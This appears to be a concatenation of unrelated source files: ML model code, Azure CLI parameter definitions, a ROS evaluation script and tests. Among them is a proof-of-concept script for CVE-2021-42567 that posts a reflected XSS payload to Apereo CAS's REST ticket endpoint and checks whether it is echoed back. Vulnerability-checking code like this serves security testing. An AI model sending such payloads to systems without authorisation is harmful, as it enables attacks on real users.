ids=lambda t: "CTokenizer" if t.USES_C else "PyTokenizer",
)
@pytest.mark.parametrize("data", build(), ids=lambda data: data["name"])
def test_tokenizer(tokenizer, data):
expected = data["output"]
actual = tokenizer().tokenize(data["input"])
assert expected == actual
@pytest.mark.parametrize("data", build(), ids=lambda data: data["name"])
def test_roundtrip(data):
expected = data["input"]
actual = str(Builder().build(data["output"][:]))
assert expected == actual
@pytest.mark.skipif(CTokenizer is None, reason="CTokenizer not available")
def test_c_tokenizer_uses_c():
"""make sure the C tokenizer identifies as using a C extension"""
assert CTokenizer.USES_C is True
assert CTokenizer().USES_C is True
def test_describe_context():
assert "" == contexts.describe(0)
ctx = contexts.describe(contexts.TEMPLATE_PARAM_KEY | contexts.HAS_TEXT)
assert "TEMPLATE_PARAM_KEY|HAS_TEXT" == ctx
|
recognition/scripts/eval/eval_reid.py | aaramirezd/open_ptrack_v2 | 218 | 12688297 | #!/usr/bin/python
import csv
import rospy
import rospkg
import cv_bridge
import message_filters
from std_msgs.msg import *
from sensor_msgs.msg import *
from geometry_msgs.msg import *
from opt_msgs.msg import *
from dynamic_reconfigure.server import Server
from recognition.cfg import FaceFeatureExtractionConfig
from face_comparing.srv import *
class EvalReidNode:
def __init__(self):
self.appeared_time = {}
self.recognized_ids = {}
self.face_name = {}
self.read_data()
self.recognition_time = []
self.success = 0
self.failure = 0
subs = [
message_filters.Subscriber('/face_recognition/people_tracks', TrackArray),
message_filters.Subscriber('/tracker/tracks_smoothed', TrackArray)
]
self.sync = message_filters.TimeSynchronizer(subs, 100)
self.sync.registerCallback(self.callback)
def read_data(self):
names = {}
n = 0
for line in csv.reader(open('data2', 'r'), delimiter=' '):
for id in line[1:]:
names[int(id)] = line[0]
n += 1
n -= 1
print names, n
self.names = names
self.face_name = {0: 'Kenji', 1: 'Francisca', 2: 'Enrico', 3: 'Andrea', 4: 'Yongheng', 5: 'Stefano'}
def callback(self, face_msg, track_msg):
for face, track in zip(face_msg.tracks, track_msg.tracks):
track_id = track.id
face_id = face.id
if track_id not in self.names:
continue
if track_id not in self.appeared_time:
self.appeared_time[track_id] = rospy.Time.now()
if face_id < 10000 and track_id not in self.recognized_ids:
self.recognized_ids[track_id] = (rospy.Time.now() - self.appeared_time[track_id]).to_sec()
self.recognition_time.append(self.recognized_ids[track_id])
print track_id, face_id, self.names[track_id]
if face_id in self.face_name:
if self.face_name[face_id] != self.names[track_id]:
self.failure += 1
else:
self.success += 1
self.face_name[face_id] = self.names[track_id]
print self.failure, self.success, sum(self.recognition_time) / len(self.recognition_time)
print self.face_name
def main():
rospy.init_node('eval_reid')
node = EvalReidNode()
rospy.spin()
if __name__ == '__main__':
main()
|
src/datashare/azext_datashare/manual/_params.py | Mannan2812/azure-cli-extensions | 207 | 12688310 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from knack.arguments import CLIArgumentType
from azure.cli.core.commands.parameters import (
tags_type,
get_enum_type,
resource_group_name_type,
get_location_type,
get_datetime_type
)
from azure.cli.core.commands.validators import get_default_location_from_resource_group, validate_file_or_dict
from azext_datashare.vendored_sdks.datashare.models._data_share_management_client_enums import ShareKind, Kind, SynchronizationMode, SynchronizationKind, RecurrenceInterval
from azext_datashare.manual._validators import invitation_id_validator
def load_arguments(self, _):
with self.argument_context('datashare account list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
with self.argument_context('datashare account show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.') # modified
with self.argument_context('datashare account create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], help='The name of the share account.') # modified
c.argument('location', arg_type=get_location_type(self.cli_ctx), validator=get_default_location_from_resource_group) # modified
c.argument('tags', tags_type) # modified
c.ignore('identity') # Only system assigned identity is supported, we can omit this option
with self.argument_context('datashare account update') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.') # modified
c.argument('tags', tags_type) # modified
with self.argument_context('datashare account delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.')
with self.argument_context('datashare account wait') as c:
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.') # modified
with self.argument_context('datashare list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
with self.argument_context('datashare show') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share.') # modified
with self.argument_context('datashare create') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', options_list=['--name', '-n'], help='The name of the share.') # modified
c.argument('description', help='Share description.') # modified
c.argument('share_kind', arg_type=get_enum_type(ShareKind), help='Share kind.') # modified
c.argument('terms', help='Share terms.') # modified
with self.argument_context('datashare delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share.') # modified
with self.argument_context('datashare wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share.') # modified
with self.argument_context('datashare dataset list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare dataset show') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('data_set_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the dataset.') # modified
with self.argument_context('datashare dataset create') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
c.argument('data_set_name', options_list=['--name', '-n'], help='The name of the dataset.') # modified
c.argument('data_set', options_list=['--dataset'], type=validate_file_or_dict, help='Dataset parameters in JSON string or path to JSON file.') # modified
with self.argument_context('datashare dataset delete') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('data_set_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the dataset.') # modified
with self.argument_context('datashare dataset wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('data_set_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the dataset.') # modified
with self.argument_context('datashare invitation list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare invitation show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('invitation_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the invitation.') # modified
with self.argument_context('datashare invitation create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
c.argument('invitation_name', options_list=['--name', '-n'], help='The name of the invitation.') # modified
c.argument('target_active_directory_id', help='The target Azure AD Id. Can\'t be combined with email.') # modified
c.argument('target_email', help='The email the invitation is directed to.') # modified
c.argument('target_object_id', help='The target user or application Id that invitation is being sent to. Must be specified along TargetActiveDirectoryId. This enables sending invitations to specific users or applications in an AD tenant.') # modified
with self.argument_context('datashare invitation delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('invitation_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the invitation.') # modified
with self.argument_context('datashare synchronization-setting list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare synchronization-setting show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('synchronization_setting_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the synchronizationSetting.') # modified
with self.argument_context('datashare synchronization-setting create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
c.argument('synchronization_setting_name', options_list=['--name', '-n'], help='The name of the synchronizationSetting.') # modified
c.argument('recurrence_interval', arg_type=get_enum_type(RecurrenceInterval), arg_group='Synchronization Setting', help='Synchronization Recurrence Interval.')
c.argument('synchronization_time', arg_group='Synchronization Setting', arg_type=get_datetime_type(help='Synchronization time.'))
c.argument('kind', arg_type=get_enum_type(SynchronizationKind), arg_group='Synchronization Setting', default='ScheduleBased', help='Kind of synchronization.')
with self.argument_context('datashare synchronization-setting delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('synchronization_setting_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the synchronizationSetting.') # modified
with self.argument_context('datashare synchronization-setting wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('synchronization_setting_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the synchronizationSetting.') # modified
with self.argument_context('datashare synchronization list-detail') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.') # modified
c.argument('share_name', help='The name of the share.') # modified
c.argument('synchronization_id', help='The synchronization GUID.')
with self.argument_context('datashare synchronization list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.') # modified
c.argument('share_name', help='The name of the share.') # modified
with self.argument_context('datashare provider-share-subscription list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare provider-share-subscription show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified TODO validator
with self.argument_context('datashare provider-share-subscription revoke') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified
with self.argument_context('datashare provider-share-subscription reinstate') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified
with self.argument_context('datashare provider-share-subscription wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified
with self.argument_context('datashare consumer invitation list') as c:
pass
with self.argument_context('datashare consumer invitation show') as c:
c.argument('location', arg_type=get_location_type(self.cli_ctx)) # modified
c.argument('invitation_id', validator=invitation_id_validator, help='An invitation id')
with self.argument_context('datashare consumer invitation reject') as c:
c.argument('location', arg_type=get_location_type(self.cli_ctx)) # modified
c.argument('invitation_id', validator=invitation_id_validator, help='An invitation id') # modified
with self.argument_context('datashare consumer share-subscription list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
with self.argument_context('datashare consumer share-subscription show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_subscription_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share subscription.') # modified
with self.argument_context('datashare consumer share-subscription create') as c:
from azure.cli.core.commands.parameters import get_location_name_type, get_location_completion_list
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', options_list=['--name', '-n'], help='The name of the share subscription.') # modified
c.argument('invitation_id', validator=invitation_id_validator, help='The invitation id.') # modified
c.argument('source_share_location', type=get_location_name_type(self.cli_ctx), help='Source share location.', completer=get_location_completion_list) # modified
with self.argument_context('datashare consumer share-subscription delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_subscription_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share subscription.') # modified
with self.argument_context('datashare consumer share-subscription list-source-share-synchronization-setting') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer share-subscription list-source-dataset') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer share-subscription wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share subscription.') # modified
with self.argument_context('datashare consumer share-subscription synchronization start') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_mode', arg_type=get_enum_type(SynchronizationMode), help='Synchronization mode') # modified
with self.argument_context('datashare consumer share-subscription synchronization cancel') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_id', help='The synchronization GUID')
with self.argument_context('datashare consumer share-subscription synchronization wait') as c:
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_id', help='The synchronization GUID')
with self.argument_context('datashare consumer share-subscription synchronization list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer share-subscription synchronization list-detail') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_id', help='Synchronization id')
with self.argument_context('datashare consumer dataset-mapping list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer dataset-mapping show') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('data_set_mapping_name', id_part='child_name_2', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
with self.argument_context('datashare consumer dataset-mapping create') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('data_set_mapping_name', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
c.argument('data_set_mapping', options_list=['--mapping'], type=validate_file_or_dict, help='Dataset mapping in JSON string or path to JSON file.') # modified
with self.argument_context('datashare consumer dataset-mapping delete') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('data_set_mapping_name', id_part='child_name_2', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
with self.argument_context('datashare consumer dataset-mapping wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('data_set_mapping_name', id_part='child_name_2', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
with self.argument_context('datashare consumer trigger list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer trigger show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('trigger_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the trigger.')
with self.argument_context('datashare consumer trigger create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('trigger_name', options_list=['--name', '-n'], help='The name of the trigger.') # modified
c.argument('recurrence_interval', arg_type=get_enum_type(RecurrenceInterval), arg_group='Synchronization Setting', help='Synchronization Recurrence Interval.')
c.argument('synchronization_time', arg_group='Synchronization Setting', arg_type=get_datetime_type(help='Synchronization time.'))
c.argument('kind', arg_type=get_enum_type(SynchronizationKind), arg_group='Synchronization Setting', default='ScheduleBased', help='Kind of synchronization.')
with self.argument_context('datashare consumer trigger delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.') # modified
c.argument('trigger_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the trigger.') # modified
with self.argument_context('datashare consumer trigger wait') as c:
c.argument('trigger_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the trigger.') # modified
|
src/core/model.py | yuanqidu/IDGL | 153 | 12688320 | <gh_stars>100-1000
import os
import random
import numpy as np
from collections import Counter
from sklearn.metrics import r2_score
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
import torch.nn.functional as F
from .models.graph_clf import GraphClf
from .models.text_graph import TextGraphRegression, TextGraphClf
from .utils.text_data.vocab_utils import VocabModel
from .utils import constants as Constants
from .utils.generic_utils import to_cuda, create_mask
from .utils.constants import INF
from .utils.radam import RAdam
class Model(object):
"""High level model that handles intializing the underlying network
architecture, saving, updating examples, and predicting examples.
"""
def __init__(self, config, train_set=None):
self.config = config
if self.config['model_name'] == 'GraphClf':
self.net_module = GraphClf
elif self.config['model_name'] == 'TextGraphRegression':
self.net_module = TextGraphRegression
elif self.config['model_name'] == 'TextGraphClf':
self.net_module = TextGraphClf
else:
raise RuntimeError('Unknown model_name: {}'.format(self.config['model_name']))
print('[ Running {} model ]'.format(self.config['model_name']))
if config['data_type'] == 'text':
saved_vocab_file = os.path.join(config['data_dir'], '{}_seed{}.vocab'.format(config['dataset_name'], config.get('data_seed', 1234)))
self.vocab_model = VocabModel.build(saved_vocab_file, train_set, self.config)
if config['task_type'] == 'regression':
assert config['out_predictions']
self.criterion = F.mse_loss
self.score_func = r2_score
self.metric_name = 'r2'
elif config['task_type'] == 'classification':
self.criterion = F.nll_loss
self.score_func = accuracy
self.metric_name = 'acc'
else:
self.criterion = F.nll_loss
self.score_func = None
self.metric_name = None
if self.config['pretrained']:
self.init_saved_network(self.config['pretrained'])
else:
# Building network.
self._init_new_network()
num_params = 0
for name, p in self.network.named_parameters():
print('{}: {}'.format(name, str(p.size())))
num_params += p.numel()
print('#Parameters = {}\n'.format(num_params))
self._init_optimizer()
def init_saved_network(self, saved_dir):
_ARGUMENTS = ['word_embed_dim', 'hidden_size', 'f_qem', 'f_pos', 'f_ner',
'word_dropout', 'rnn_dropout',
'ctx_graph_hops', 'ctx_graph_topk',
'score_unk_threshold', 'score_yes_threshold',
'score_no_threshold']
# Load all saved fields.
fname = os.path.join(saved_dir, Constants._SAVED_WEIGHTS_FILE)
print('[ Loading saved model %s ]' % fname)
saved_params = torch.load(fname, map_location=lambda storage, loc: storage)
self.state_dict = saved_params['state_dict']
# for k in _ARGUMENTS:
# if saved_params['config'][k] != self.config[k]:
# print('Overwrite {}: {} -> {}'.format(k, self.config[k], saved_params['config'][k]))
# self.config[k] = saved_params['config'][k]
if self.config['data_type'] == 'text':
w_embedding = self._init_embedding(len(self.vocab_model.word_vocab), self.config['word_embed_dim'])
self.network = self.net_module(self.config, w_embedding, self.vocab_model.word_vocab)
else:
self.network = self.net_module(self.config)
# Merge the arguments
if self.state_dict:
merged_state_dict = self.network.state_dict()
for k, v in self.state_dict['network'].items():
if k in merged_state_dict:
merged_state_dict[k] = v
self.network.load_state_dict(merged_state_dict)
def _init_new_network(self):
if self.config['data_type'] == 'text':
w_embedding = self._init_embedding(len(self.vocab_model.word_vocab), self.config['word_embed_dim'],
pretrained_vecs=self.vocab_model.word_vocab.embeddings)
self.network = self.net_module(self.config, w_embedding, self.vocab_model.word_vocab)
else:
self.network = self.net_module(self.config)
def _init_optimizer(self):
parameters = [p for p in self.network.parameters() if p.requires_grad]
if self.config['optimizer'] == 'sgd':
self.optimizer = optim.SGD(parameters, self.config['learning_rate'],
momentum=self.config['momentum'],
weight_decay=self.config['weight_decay'])
elif self.config['optimizer'] == 'adam':
self.optimizer = optim.Adam(parameters, lr=self.config['learning_rate'], weight_decay=self.config['weight_decay'])
elif self.config['optimizer'] == 'adamax':
self.optimizer = optim.Adamax(parameters, lr=self.config['learning_rate'])
elif self.config['optimizer'] == 'radam':
self.optimizer = RAdam(parameters, lr=self.config['learning_rate'], weight_decay=self.config['weight_decay'])
else:
raise RuntimeError('Unsupported optimizer: %s' % self.config['optimizer'])
self.scheduler = ReduceLROnPlateau(self.optimizer, mode='max', factor=self.config['lr_reduce_factor'], \
patience=self.config['lr_patience'], verbose=True)
def _init_embedding(self, vocab_size, embed_size, pretrained_vecs=None):
"""Initializes the embeddings
"""
return nn.Embedding(vocab_size, embed_size, padding_idx=0,
_weight=torch.from_numpy(pretrained_vecs).float()
if pretrained_vecs is not None else None)
def save(self, dirname):
params = {
'state_dict': {
'network': self.network.state_dict(),
},
'config': self.config,
'dir': dirname,
}
try:
torch.save(params, os.path.join(dirname, Constants._SAVED_WEIGHTS_FILE))
except BaseException:
print('[ WARN: Saving failed... continuing anyway. ]')
def clip_grad(self):
# Clip gradients
if self.config['grad_clipping']:
parameters = [p for p in self.network.parameters() if p.requires_grad]
torch.nn.utils.clip_grad_norm_(parameters, self.config['grad_clipping'])
def train_batch(batch, network, vocab, criterion, forcing_ratio, rl_ratio, config, wmd=None):
network.train(True)
with torch.set_grad_enabled(True):
ext_vocab_size = batch['oov_dict'].ext_vocab_size if batch['oov_dict'] else None
network_out = network(batch, batch['targets'], criterion,
forcing_ratio=forcing_ratio, partial_forcing=config['partial_forcing'], \
sample=config['sample'], ext_vocab_size=ext_vocab_size, \
include_cover_loss=config['show_cover_loss'])
if rl_ratio > 0:
batch_size = batch['context'].shape[0]
sample_out = network(batch, saved_out=network_out, criterion=criterion, \
criterion_reduction=False, criterion_nll_only=True, \
sample=True, ext_vocab_size=ext_vocab_size)
baseline_out = network(batch, saved_out=network_out, visualize=False, \
ext_vocab_size=ext_vocab_size)
sample_out_decoded = sample_out.decoded_tokens.transpose(0, 1)
baseline_out_decoded = baseline_out.decoded_tokens.transpose(0, 1)
neg_reward = []
for i in range(batch_size):
scores = eval_batch_output([batch['target_src'][i]], vocab, batch['oov_dict'],
[sample_out_decoded[i]], [baseline_out_decoded[i]])
greedy_score = scores[1][config['rl_reward_metric']]
reward_ = scores[0][config['rl_reward_metric']] - greedy_score
if config['rl_wmd_ratio'] > 0:
# Add word mover's distance
sample_seq = batch_decoded_index2word([sample_out_decoded[i]], vocab, batch['oov_dict'])[0]
greedy_seq = batch_decoded_index2word([baseline_out_decoded[i]], vocab, batch['oov_dict'])[0]
sample_wmd = -wmd.distance(sample_seq, batch['target_src'][i]) / max(len(sample_seq.split()), 1)
greedy_wmd = -wmd.distance(greedy_seq, batch['target_src'][i]) / max(len(greedy_seq.split()), 1)
wmd_reward_ = sample_wmd - greedy_wmd
wmd_reward_ = max(min(wmd_reward_, config['max_wmd_reward']), -config['max_wmd_reward'])
reward_ += config['rl_wmd_ratio'] * wmd_reward_
neg_reward.append(reward_)
neg_reward = to_cuda(torch.Tensor(neg_reward), network.device)
# if sample > baseline, the reward is positive (i.e. good exploration), rl_loss is negative
rl_loss = torch.sum(neg_reward * sample_out.loss) / batch_size
rl_loss_value = torch.sum(neg_reward * sample_out.loss_value).item() / batch_size
loss = (1 - rl_ratio) * network_out.loss + rl_ratio * rl_loss
loss_value = (1 - rl_ratio) * network_out.loss_value + rl_ratio * rl_loss_value
metrics = eval_batch_output(batch['target_src'], vocab, \
batch['oov_dict'], baseline_out.decoded_tokens)[0]
else:
loss = network_out.loss
loss_value = network_out.loss_value
metrics = eval_batch_output(batch['target_src'], vocab, \
batch['oov_dict'], network_out.decoded_tokens)[0]
return loss, loss_value, metrics
def accuracy(labels, output):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum().item()
return correct / len(labels)
|
2021/CVE-2021-42567/poc/pocsploit/CVE-2021-42567.py | hjyuan/reapoc | 421 | 12688337 | <gh_stars>100-1000
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Apereo CAS Reflected Cross-Site Scripting''',
"description": '''Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.''',
"severity": "medium",
"references": [
"https://apereo.github.io/2021/10/18/restvuln/",
"https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html",
"https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md",
"https://nvd.nist.gov/vuln/detail/CVE-2021-42567",
"https://github.com/apereo/cas/releases"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-42567",
"cwe-id": "CWE-79"
},
"metadata":{
"vuln-target": "",
"shodan-query":"""http.title:'CAS - Central Authentication Service'"""
},
"tags": ["cve", "cve2021", "apereo", "xss", "cas"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/cas/v1/tickets/"""
method = "POST"
data = """username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=<PASSWORD>"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""<img/src/onerror=alert(document.domain)>""" in resp0.text and """java.util.HashMap""" in resp0.text) and (resp0.status_code == 401):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
malaya_speech/train/model/pix2pix/discriminator.py | ishine/malaya-speech | 111 | 12688345 | <filename>malaya_speech/train/model/pix2pix/discriminator.py<gh_stars>100-1000
import tensorflow as tf
from .layer import *
class Discriminator:
def __init__(self, inputs, targets, ndf=64):
n_layers = 3
layers = []
input = tf.concat([inputs, targets], axis=3)
with tf.variable_scope('layer_1'):
convolved = discrim_conv(input, ndf, stride=2)
rectified = lrelu(convolved, 0.2)
layers.append(rectified)
for i in range(n_layers):
with tf.variable_scope('layer_%d' % (len(layers) + 1)):
out_channels = ndf * min(2 ** (i + 1), 8)
stride = 1 if i == n_layers - 1 else 2
convolved = discrim_conv(
layers[-1], out_channels, stride=stride
)
normalized = batchnorm(convolved)
rectified = lrelu(normalized, 0.2)
layers.append(rectified)
with tf.variable_scope('layer_%d' % (len(layers) + 1)):
convolved = discrim_conv(rectified, out_channels=1, stride=1)
output = tf.sigmoid(convolved)
layers.append(output)
self.logits = layers[-1]
|
ssim.py | ebartrum/NovelViewSynthesis-TensorFlow | 192 | 12688359 | import tensorflow as tf
import numpy as np
def _tf_fspecial_gauss(size, sigma, ch=1):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x_data, y_data = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
x_data = np.expand_dims(x_data, axis=-1)
x_data = np.expand_dims(x_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
x = tf.constant(x_data, dtype=tf.float32)
y = tf.constant(y_data, dtype=tf.float32)
g = tf.exp(-((x**2 + y**2)/(2.0*sigma**2)))
g = tf.tile(g, [1, 1, ch, 1])
return g / tf.reduce_sum(g)
